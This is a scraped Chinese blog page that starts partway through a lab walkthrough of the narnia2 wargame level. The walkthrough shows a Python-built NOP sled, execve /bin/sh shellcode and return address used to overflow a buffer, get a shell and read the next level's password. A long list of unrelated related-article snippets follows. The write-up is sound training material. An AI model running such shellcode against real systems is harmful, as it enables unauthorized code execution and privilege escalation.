      x53\x89\xe1\xb0\x0b\xcd\x8 0" + "\x90" * 67 + "\x50\xd8\xff\xff"'"
    • 进程5823执行新的程序:/bin/dash
  • $ cat /etc/narnia_pass/narnia3
    • cat: /etc/narnia_pass/narnia3: Permission denied

现在可以运行shellcode,但是由于某种原因,不能够读取narnia3账户口令。可以尝试脱离GDB调试环境运行程序。

  • narnia2@melinda:/narnia$ ./narnia2 'python -c 'print "\x90" * 50 +"\x31
    \xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\x
    e1\xb0\x0b\xcd\x80" + "\x90" * 67 + "\x50\xd8\xff\xff"'`
  • $ cat /etc/narnia_pass/narnia3
    • [这儿是narnia3答案]

终于发挥作用了!我们现在获得高权限的shell,并可以读取narnia3的密码(见图1.11)。希望通过这个例子,您能初步了解缓冲区溢出是如何产生以及如何进行漏洞利用。记住,这是一个二进制漏洞利用的起始阶段。现在可以用一些时间尝试其他的例子。

图1.11 narnia2漏洞利用

心得总结

说实话那么多工具最好按照功能和操作去区分,这样算下来就是搭建和安装的工作量大。其他的跑两遍就好了。

查看全文
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

相关文章

  1. Bus memory attribute

    根据程序的局部性原理,在主存与CPU之间设置的一个高速的容量较小的存储器,叫做cache。 ARM cache架构由cache存储器和写缓冲器(write-buffer)组成。其中Write_buffer是cache按照FIFO原则向主存写的缓冲器。 cache可以分为Dcache,Icache。分别cache data和 instruction。其中…...

    2024/4/27 21:35:50
  2. 以太坊教程-使用 remix-ide 开发以太坊智能合约

    介绍 目前以太坊上支持三种语言编写智能合约, Solidity:类似JavaScript,这是以太坊官方推荐语言,也是最流行的智能合约语言。具体用法参加Solidity文档,地址:https://solidity.readthedocs.io/en/latest/ 本次我们将学习使用 remix-ide 这个编辑器来开发智能合约。 remix…...

    2024/4/28 0:53:23
  3. C语言学习笔记——关于 .obj 文件的理解

    【编译】:根据当前源代码编译成二进制目标文件(即.obj文件)【链接(link)】:将生成的.obj文件与库文件.lib等文件链接,生成可执行文件(.exe文件)。一个现代【编译器】的主要工作流程如下: 源程序(source code)→预处理器(preprocessor)→编译器(compiler)→汇编…...

    2024/4/28 16:29:03
  4. 2018百度测试开发面经(已拿offer)

    一开始报的Android开发,但是后来电话通知我今年武汉没有Android开发,要不要转成移动测试。我就转岗了。百度加起来一起有四面,第一面大概是评估面,第二天连续三面。每一面的流程基本一致,主要是自我介绍,项目,测试相关,手写代码。评估面自我介绍 项目一些提问 你如何测…...

    2024/4/28 16:40:04
  5. 利用Python绘制Jazz网络图

    最近在进行社交网络的学习,想利用Python来进行分析,但是网上关于这方面的资料好像很少,所以自己进行了一点研究,算是有一点点进步,现在将自己的成果发出来,希望这方面感兴趣的同学也可以快速入门。话不多说,让我们开始吧~ 1:环境准备 首先,就是python以及一些插件的…...

    2024/4/28 7:24:25
  6. C语言编写简单朗读小工具(有源码)网友:这波可以,稳中带皮!

    最近不少人在后台留言说学C都是面对枯燥的控制台程序,能不能体现一下C语言的实际用途,今天我们就理论结合实践一把:C语言结合VBS脚本编写一个简单的朗读小工具,做一个能够发音的C语言程序(保证简单,人人都能学会)。 下面是小编整理好的一套C/C++资料,加小编C/C++编程学…...

    2024/4/28 1:57:00
  7. tiny6410关闭mmu和cache

    关闭mmu和cache要分成两步,首先要使i,dcache无效,然后关闭i,dcache和mmu。 mmu跟cache的控制寄存器在手册《Arm1176jzfs》中,主要是设置cp15寄存器。 c1是控制寄存器,主要是设置c1. 设置的汇编代码格式已经在手册中给出,可以自己查阅手册。 在reset处设置跳转指令bl disab…...

    2024/4/28 21:55:16
  8. 黑客帝国_屏幕保护程序

    Hacker empire 声明:本程序资源纯属个人创作,文尾提供程序下载地址。 效果图:程序思路说明:1:本源码是在VS2013中编写,在其他版本编译器应该也可以。2:在VS2013下新建Win32项目,将窗口设置为全屏,并隐藏鼠标……,详见下面main.cpp#include <iostream> #include…...

    2024/4/14 22:32:09
  9. 软件测试-------Selenium IDE安装与运行

    Selenium IDE安装与运行 1. Selenium IDE 是什么? Selenium IDE:是一个Firefox插件,用于记录和播放用户与浏览器的交互。 (录制Web操作脚本) seleniumIDE作用:实现页面操作的动作录制并输出为相应的脚本。1.1 为什么要学习Selenium IDE?使用Selenium IDE录制脚本,体验自…...

    2024/4/14 22:32:08
  10. 测试开发成长学习路线--引导篇

    我相信,有很多测试人员会不断问自己,自己到底要不要坚持做测试,测试的职业发展到底怎么样?如果你还在迷茫,在到处找各种大牛问类似的问题,我希望这篇文章,你看完能够结束你的这个烦恼,给你更多的指明方向,当然也有更多的压力。这个问题,就像大学报考专业一样,很多人…...

    2024/4/14 22:32:07
  11. 为什么要学好c语言,c语言到底多重要,你造吗

    一、前言对于理工 科学生来说,这个答案可能很简单,因为这是一门必修课。而对于程序员来说选择一门编程语言,在某种程度上,对职业生涯的发展会产生重大的影响,所以必须慎 之又慎。那么,为什么要选择一门诞生了将近半个世纪的语言?本文不是老生常谈的废话,如:”C 语言是…...

    2024/4/14 22:05:01
  12. 隐写术:看黑客如何秘密隐藏恶意软件

    在当今最受关注的APT攻击和零时差漏洞利用中经常使用某些方法来逃避检测,而黑客用来在隐秘通道内隐藏数据的一切可能方法,就是我们所认为的“隐写术” ZeusVM:在 JPG图片里隐藏恶意软件的配置文件 有一类Zeus病毒变种用一种特殊的方法隐藏它的配置文件,利用图片在其图像文件…...

    2024/4/14 22:05:00
  13. 如何建立投资模型

    建立投资模型-辅助投资决策理论基础-正负向情绪分析网络上有些舆情是来自于微博等社交网络,建立投资模型的逻辑使用微博正负评情绪指标判断进场点;正负向情绪分析 是否有效?鸡生蛋还是蛋生鸡的问题是因为投资人的情绪不好才导致股票下跌,还是因为股票导致情绪不好;...

    2024/4/18 10:30:41
  14. 移动测试开发线下培训班_霍格沃兹测试学院

    老师介绍思寒:十年以上测试行业工作经验,先后工作于阿里、百度、Testin、雪球等公司,开源项目AppCrawler作者,现为霍格沃兹测试学院的首任校长。乔巴:资深测试开发工程师,擅长docker,java,python和j s。目前在一家一线人工智能公司任职。对机器学习略有涉猎欧莉米:九…...

    2024/4/14 22:04:57
  15. Eclipse还是开源IDE的领头羊吗?

    随着NetBean6.0发布脚步的逼迫,Java IDE领域又是风起云涌,刀光剑影。随着老牌的JBuilder已成昔日黄花,最近几年火的不得了的Eclipse还没来得及体验“高处不胜寒”的成就感,即被Sun公司如法泡制的NetBeans给抢了镜头。如今的Sun,对IBM来了个以其人之道还及其人之身,对Ecl…...

    2024/4/14 22:04:58
  16. 存储器扫盲

    依然源自《主流ARM嵌入式系统设计技术与实例精解》关于存储器 文档原则:这事儿不可说的太细,不高大全。 用途:储存数据,比如代码,数据文件,变量等。 一般嵌入式都会涉及到片内存储器和片外存储器,前次做得单片机的项目就我完全是利用 片内的Flash,RAM以及ROM这些片内存…...

    2024/4/16 19:15:54
  17. 浅谈黑客入侵系统的四条常规手段及应对措施

    孙子兵法上说,知己知彼,百战不殆。要想有效的防范黑客对我们电脑的入侵和破坏,仅仅被动的安装防火墙是显然不够的,我们更应该了解一些常见的黑客入侵手法,针对不同的方法采取不同的措施,做到有的放矢。1、木马入侵木马也许是广大电脑爱好者最深恶痛绝的东东了,相信不少朋…...

    2024/4/19 13:34:34
  18. MPLAB X IDE调试仿真功能简单入门

    仿真分为硬件仿真和软件仿真,这里的硬件仿真和软件仿真的区别,就不多说了,相信大家都听说过这两个概念。 我这里想给大家介绍的是“Set PC at Cursor”--“设置PC到光标处”这个功能,这个功能实在是太好了,我们在仿真的时候,总会由于某种原因,程序指针PC不走了(硬件中…...

    2024/4/14 22:04:54
  19. 关于产品经理、研发人员和测试人员角色职责的思考

    作者 | 蓝灰_q地址 | https://www.jianshu.com/p/688deb48d243声明 | 本文是 蓝灰_q 原创,已获授权发布,未经原作者允许请勿转载关于生产流程混乱问题 在软件研发这件事上,由于研发并不直接带来收入和利润,在实际情况中,业务优先、功能优先的思想,很容易导致生产流程的混…...

    2024/4/14 22:32:07
  20. 大家的C语言-200-简单聊聊C语言

    接下来要搭建C语言编程环境了。搭建环境后就正式进入C语言的学习。因此这里先简单聊聊C语言。关于C语言的历史,本教程就不多介绍了。网上的资料有很多,没有必要再重复一遍。只简单说一下我个人理解的C语言为什么能流行近半个世纪的原因。 主要有两个原因: 原因一:必须。软件…...

    2024/4/14 22:32:05

最新文章

  1. vscode的终端区乱码怎么办呢?

    vscode的终端区乱码怎么办呢? 错误效果解决办法一解决办法二(极力推荐方法二)最终效果参考文献 错误效果 解决办法一 解释:你之所以使用了utf8还乱码,是因为你的电脑目前根本无法兼容utf8,只兼容gbk 怎么让你的电脑兼容utf8,我写在方法二 在设置中,输入encoding 解决办法二(极…...

    2024/4/29 1:55:23
  2. 梯度消失和梯度爆炸的一些处理方法

    在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言&#xff0c;在此感激不尽。 权重和梯度的更新公式如下&#xff1a; w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...

    2024/3/20 10:50:27
  3. 第十二届蓝桥杯省赛真题(C/C++大学B组)

    目录 #A 空间 #B 卡片 #C 直线 #D 货物摆放 #E 路径 #F 时间显示 #G 砝码称重 #H 杨辉三角形 #I 双向排序 #J 括号序列 #A 空间 #include <bits/stdc.h> using namespace std;int main() {cout<<256 * 1024 * 1024 / 4<<endl;return 0; } #B 卡片…...

    2024/4/29 1:41:00
  4. Go语言中如何实现继承

    完整课程请点击以下链接 Go 语言项目开发实战_Go_实战_项目开发_孔令飞_Commit 规范_最佳实践_企业应用代码-极客时间 Go语言中没有传统意义上的类和继承的概念&#xff0c;但可以通过嵌入类型&#xff08;embedded types&#xff09;来实现类似的功能。嵌入类型允许一个结构…...

    2024/4/23 6:14:42
  5. 【外汇早评】美通胀数据走低,美元调整

    原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...

    2024/4/28 13:52:11
  6. 【原油贵金属周评】原油多头拥挤,价格调整

    原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...

    2024/4/28 3:28:32
  7. 【外汇周评】靓丽非农不及疲软通胀影响

    原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...

    2024/4/26 23:05:52
  8. 【原油贵金属早评】库存继续增加,油价收跌

    原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...

    2024/4/28 13:51:37
  9. 【外汇早评】日本央行会议纪要不改日元强势

    原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...

    2024/4/27 17:58:04
  10. 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响

    原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...

    2024/4/27 14:22:49
  11. 【外汇早评】美欲与伊朗重谈协议

    原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...

    2024/4/28 1:28:33
  12. 【原油贵金属早评】波动率飙升,市场情绪动荡

    原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...

    2024/4/28 15:57:13
  13. 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试

    原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...

    2024/4/27 17:59:30
  14. 【原油贵金属早评】市场情绪继续恶化,黄金上破

    原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...

    2024/4/25 18:39:16
  15. 【外汇早评】美伊僵持,风险情绪继续升温

    原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...

    2024/4/28 1:34:08
  16. 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势

    原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...

    2024/4/26 19:03:37
  17. 氧生福地 玩美北湖(上)——为时光守候两千年

    原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...

    2024/4/28 1:22:35
  18. 氧生福地 玩美北湖(中)——永春梯田里的美与鲜

    原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...

    2024/4/25 18:39:14
  19. 氧生福地 玩美北湖(下)——奔跑吧骚年!

    原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...

    2024/4/26 23:04:58
  20. 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!

    原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...

    2024/4/27 23:24:42
  21. 「发现」铁皮石斛仙草之神奇功效用于医用面膜

    原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...

    2024/4/28 5:48:52
  22. 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者

    原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...

    2024/4/26 19:46:12
  23. 广州械字号面膜生产厂家OEM/ODM4项须知!

    原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...

    2024/4/27 11:43:08
  24. 械字号医用眼膜缓解用眼过度到底有无作用?

    原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...

    2024/4/27 8:32:30
  25. 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...

    解析如下&#xff1a;1、长按电脑电源键直至关机&#xff0c;然后再按一次电源健重启电脑&#xff0c;按F8健进入安全模式2、安全模式下进入Windows系统桌面后&#xff0c;按住“winR”打开运行窗口&#xff0c;输入“services.msc”打开服务设置3、在服务界面&#xff0c;选中…...

    2022/11/19 21:17:18
  26. 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。

    %读入6幅图像&#xff08;每一幅图像的大小是564*564&#xff09; f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...

    2022/11/19 21:17:16
  27. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...

    win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面&#xff0c;在等待界面中我们需要等待操作结束才能关机&#xff0c;虽然这比较麻烦&#xff0c;但是对系统进行配置和升级…...

    2022/11/19 21:17:15
  28. 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...

    有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows&#xff0c;请勿关闭计算机”的提示&#xff0c;要过很久才能进入系统&#xff0c;有的用户甚至几个小时也无法进入&#xff0c;下面就教大家这个问题的解决方法。第一种方法&#xff1a;我们首先在左下角的“开始…...

    2022/11/19 21:17:14
  29. win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...

    置信有很多用户都跟小编一样遇到过这样的问题&#xff0c;电脑时发现开机屏幕显现“正在配置Windows Update&#xff0c;请勿关机”(如下图所示)&#xff0c;而且还需求等大约5分钟才干进入系统。这是怎样回事呢&#xff1f;一切都是正常操作的&#xff0c;为什么开时机呈现“正…...

    2022/11/19 21:17:13
  30. 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...

    Win7系统开机启动时总是出现“配置Windows请勿关机”的提示&#xff0c;没过几秒后电脑自动重启&#xff0c;每次开机都这样无法进入系统&#xff0c;此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一&#xff1a;开机按下F8&#xff0c;在出现的Windows高级启动选…...

    2022/11/19 21:17:12
  31. 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...

    有不少windows10系统用户反映说碰到这样一个情况&#xff0c;就是电脑提示正在准备windows请勿关闭计算机&#xff0c;碰到这样的问题该怎么解决呢&#xff0c;现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法&#xff1a;1、2、依次…...

    2022/11/19 21:17:11
  32. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...

    今天和大家分享一下win7系统重装了Win7旗舰版系统后&#xff0c;每次关机的时候桌面上都会显示一个“配置Windows Update的界面&#xff0c;提示请勿关闭计算机”&#xff0c;每次停留好几分钟才能正常关机&#xff0c;导致什么情况引起的呢&#xff1f;出现配置Windows Update…...

    2022/11/19 21:17:10
  33. 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...

    只能是等着&#xff0c;别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚&#xff0c;只能是考虑备份数据后重装系统了。解决来方案一&#xff1a;管理员运行cmd&#xff1a;net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...

    2022/11/19 21:17:09
  34. 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?

    原标题&#xff1a;电脑提示“配置Windows Update请勿关闭计算机”怎么办&#xff1f;win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢&#xff1f;一般的方…...

    2022/11/19 21:17:08
  35. 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...

    关机提示 windows7 正在配置windows 请勿关闭计算机 &#xff0c;然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;关机提示 windows7 正在配…...

    2022/11/19 21:17:05
  36. 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...

    钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...

    2022/11/19 21:17:05
  37. 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...

    前几天班里有位学生电脑(windows 7系统)出问题了&#xff0c;具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面&#xff0c;长时间没反应&#xff0c;无法进入系统。这个问题原来帮其他同学也解决过&#xff0c;网上搜了不少资料&#x…...

    2022/11/19 21:17:04
  38. 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...

    本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法&#xff0c;并在最后教给你1种保护系统安全的好方法&#xff0c;一起来看看&#xff01;电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中&#xff0c;添加了1个新功能在“磁…...

    2022/11/19 21:17:03
  39. 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...

    许多用户在长期不使用电脑的时候&#xff0c;开启电脑发现电脑显示&#xff1a;配置windows更新失败&#xff0c;正在还原更改&#xff0c;请勿关闭计算机。。.这要怎么办呢&#xff1f;下面小编就带着大家一起看看吧&#xff01;如果能够正常进入系统&#xff0c;建议您暂时移…...

    2022/11/19 21:17:02
  40. 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...

    配置windows update失败 还原更改 请勿关闭计算机&#xff0c;电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;配置windows update失败 还原更改 请勿关闭计算机&#x…...

    2022/11/19 21:17:01
  41. 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...

    不知道大家有没有遇到过这样的一个问题&#xff0c;就是我们的win7系统在关机的时候&#xff0c;总是喜欢显示“准备配置windows&#xff0c;请勿关机”这样的一个页面&#xff0c;没有什么大碍&#xff0c;但是如果一直等着的话就要两个小时甚至更久都关不了机&#xff0c;非常…...

    2022/11/19 21:17:00
  42. 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...

    当电脑出现正在准备配置windows请勿关闭计算机时&#xff0c;一般是您正对windows进行升级&#xff0c;但是这个要是长时间没有反应&#xff0c;我们不能再傻等下去了。可能是电脑出了别的问题了&#xff0c;来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...

    2022/11/19 21:16:59
  43. 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...

    我们使用电脑的过程中有时会遇到这种情况&#xff0c;当我们打开电脑之后&#xff0c;发现一直停留在一个界面&#xff1a;“配置Windows Update失败&#xff0c;还原更改请勿关闭计算机”&#xff0c;等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢&#xff0…...

    2022/11/19 21:16:58
  44. 如何在iPhone上关闭“请勿打扰”

    Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...

    2022/11/19 21:16:57